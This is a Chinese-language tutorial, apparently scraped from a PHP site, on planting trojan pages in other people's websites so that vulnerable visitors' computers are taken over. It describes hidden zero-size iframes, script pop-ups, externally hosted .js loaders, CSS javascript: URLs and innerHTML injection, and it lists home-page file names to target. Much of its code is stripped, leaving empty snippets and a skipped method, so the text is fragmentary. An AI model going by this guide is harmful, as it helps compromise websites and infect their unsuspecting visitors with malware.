php网站挂马,网页挂马详细教程
其实很简单的的,说到原理,就一个:就是在人家网站的主页那里插入一个自己的网马的页面,等有漏洞的人查看了人家网站的主页,那么他就成了你的肉鸡了。 下面我介绍5种方法,我一个一个介绍 方法一:这个就是最简单的了,只要你懂点html语言 把下面这段代码
其实很简单的的,说到原理,就一个:就是在人家网站的主页那里插入一个自己的网马的页面,等有漏洞的人查看了人家网站的主页,那么他就成了你的肉鸡了。
下面我介绍5种方法,我一个一个介绍
方法一:这个就是最简单的了,只要你懂点html语言
把下面这段代码插进网页中:
我来插入,理论上来说插到任何地方都行,只是不要把html语言给弄乱了就行
本来没有插进去的页面就是这样,不知道网易那里有没有弹出的广告了,好我们运行,注意到网页的左下角的网址变化
看到左下角了吧,那里在请求www.163.com,说明我们插入进去的页面也运行了,哦,还有个弹出的窗口,给我的工具拦了,我来刷新一次,看到吧
width="0" height="0" frameborder="0"就是大小高度的意思,我们把他设置为零,那我们就不能看到网页的内容了
看下一种方法,把原来插进去的清理掉先,等下那个文件还要用
方法二:这个就是脚本
我们做网页的时候就会加入很多网页特效,同样我们也可以用来打开我们的网马,那么浏览过机子就会中我们的网马了~
学过java的都知道上面一段代码的意思了把!打开网站的同时也就打开了我们的http://www.xx.com/test.htm
看我们插进去
弹出的窗口给拦了,我去掉先,还是给拦了
晕,有个窗口弹了出来,这样子的网马是不保险的……不过也不失为一种方法
呃~改成0就更大的窗口了,好,方法而已,只是介绍,下一个
方法三:
还有一点就是比较隐蔽的那就是使用js文件
document.write("");
document.write("");
我们没必要挂两个网马,就写一个好了额
刚才写错位置了
保存为mm.js,然后在首页里调用js脚本
这个就是调用的代码,从这里我们可以看到http://xxxxxxx.net/mm.js,说明我们的mm.js文件可以不传到主机上,这样可以方便我们批量管理我们挂马,传到我们的主页空间上就可以了不过我这里就不传了,就用本地的吧,运行
左下角……调用了163的了,再刷新下,看清楚点,OK下一种方法
方法五:
再一种代码就是调用其他网页的页面文件,可以将下面的代码复制,保存为HTM文件。
打开这个网页文件时显示的是index.htm的内容,而实际上还同时执行了help.htm的代码,大家可以对应
自己生成的木马页和想调用的网页来修改help.htm和index.htm,把它们改成你的文件名就可以了。
这个方法以前黑防的文章有,我就直讲运用了
我改代码换成其他的页面了,还是要注意页面的左下角,出错了,重来
看到左下角了吧,再刷新一次
看到了吧,只是太快就没了
再说下我们挂马的时候一般选取的页面
我们选取用来插马的页面一般是网站的首页
比如:index.htm、index.html、index.asp、index.aspx、index.php、index.cgi、index.jsp、default.htm、default.html default.asp default.aspx default.cgi default.jsp default.php等等,大家就自己记录下来吧,其他页面也可以插入,只要人家没有打上补丁
一:框架挂马
二:js文件挂马
首先将以下代码
document.write("");
保存为xxx.js,
则JS挂马代码为
三:js变形加密
muma.txt可改成任意后缀
四:body挂马
五:隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + '/r/n';
六:css中挂马
body {
background-image: url('javascript:document.write("")')}
七:JAJA挂马
八:图片伪装
九:伪装调用:
十:高级欺骗
本文原创发布php中文网,转载请注明出处,感谢您的尊重!
php网站挂马,网页挂马详细教程相关推荐
- 真正从零开始搭建网站—宝塔面板+wordpress(超详细教程)
如果还有不了解宝塔面板怎么使用的小伙伴,可以看下我总结的系列教程,保证从新手变老鸟: [宝塔面板精选教程汇总] 宝塔面板教程(1)基于云服务器搭建宝塔面板教程最全详解 宝塔面板教程(2)宝塔面板添加W ...
- 马踏棋盘-数据结构 详细教程
文章目录 一.问题描述 二.问题分析 三.深度优先搜索(Depth First Search) 1.基本原理 2.代码预览 四.dfs+贪心算法 1.贪心策略 2.贪心原理 3.核心代码 4.代码预览 ...
- 手机网站一键秒变App?详细教程来了
App开发大家都耳熟能详,可如果要把一个网站变成app,需要怎么操作?一款利器为大家奉上. 使用APICloud开发平台可以在线云编译,将已有HTML5网站一键打包生成iOS.Android App, ...
- python爬取网页代码-python爬虫爬取网页所有数据详细教程
Python爬虫可通过查找一个或多个域的所有 URL 从 Web 收集数据.Python 有几个流行的网络爬虫库和框架.大家熟知的就是python爬取网页数据,对于没有编程技术的普通人来说,怎么才能快 ...
- 金山毒霸四月安全趋势 继续关注网页挂马
根据三月所观察与收集到的数据,金山毒霸反病毒工程师对4月份的安全形式做出以下估计与提示: 提防木马下载器的再度爆发 整个3月份,病毒团伙的精力都放在制造网页挂马上,猫癣.死牛等传统的木马下载器几乎停止 ...
- Linux 网页挂马实验,网页挂马详细教程
网页挂马详细教程 网页挂马详细教程 其实很简单的的,说到原理,就一个:就是在人家网站的主页那里插入一个自己的网马的页面,等有漏洞的人查看了人家网站的主页,那么他就成了你的肉鸡了.. 下面我介绍5种方法 ...
- Web安全-检测-网页挂马
网马 网马的本质是一个特定的网页,这个网页包含了攻击者精心构造的恶意代码,这些恶意代码通过利用浏览器(包括控件.插件)的漏洞,加载并执行攻击者指定的恶意软件(通常是木马). 网站挂马是黑客植入木马的一 ...
- 饱受ARP攻击和挂马网页自动下载木马之苦的朋友们进来看
饱受ARP攻击和挂马网页自动下载木马之苦的朋友们进来看 "木马猛于虎也",这句话用在现在的网民(包括我这样的老菜鸟)身上真是再贴切不过了,经常发现有程序会自动下载病毒和木马 ...
- 如何预防和检测网页挂马?
在网站优化设计当中,检测网页木马也是很重要的一项工作,目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入以js调用方式的.本文主要介绍网页挂马的种类.如何检测网页是否被挂马.如何清除网页 ...
- 如何预防和检测网页挂马(转)
转自:http://lusongsong.com/reed/79.html 1:网页挂马的种类. 目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入以js调用方式的.更详细的资料,请点击 ...
最新文章
- 如何实现显示超过10个字符就显示省略号?
- 照片墙瀑布流加载与阻止加载
- 复旦肖仰华:领域知识图谱落地实践中的问题与对策
- 相位语谱图或将打破机械音
- LeNet训练MNIST
- Appium移动自动化测试(三)--安装Android模拟器(转)
- About SOuP
- vb.net中滚动条一直显示没有数据时也显示_前端学习中你必须了解的几张图
- BeginnersBook MongoDB 教程
- 5不能另存为dwg_5.建立数模
- centos安装软件后没有快捷键,创建桌面快捷键的方式【pycharm的快捷键】
- 简书的假想用户场景以及不同用户各自需要解决的烦恼
- hdu 4717 The Moving Points(三分)
- android studio for android learning (二十四 )bitmap and bitmapFactory
- X5 浏览器内核调研报告
- 备份路由器配置文件到服务器,手把手教您如何进行备份Cisco路由器配置
- 如何去掉PDF右下角的全能扫描王水印
- 面试官:你们的redis主要用来做什么?
- NEO智能合约开发(二)再续不可能的任务
- 2012年腾讯实习生笔试附加题
热门文章
- 计算机丢失dll文件夹,简单几招教你解决windows7旗舰版丢失dll文件
- 五子棋java毕业设计论文_Java五子棋毕业设计论文
- VM安装MAC虚拟机
- 学习心得《稻盛和夫经营学》的读后感2300字
- chrome 切换标签页快捷键_chrome浏览页面常用快捷键
- 关于使用js的setAttribute和getAttribute取dom属性在ie ff safri下的问题
- webpack打包告警We noticed you‘re using the `useBuiltIns` option without declaring a core-js version.
- 日常问题解决之JAVA标签打印设置纸张大小
- celeste第二章_蔚蓝全剧情全流程攻略 全关卡详解图文攻略
- python实时定位查询系统_selenium打开天眼查实现自动搜索查找功能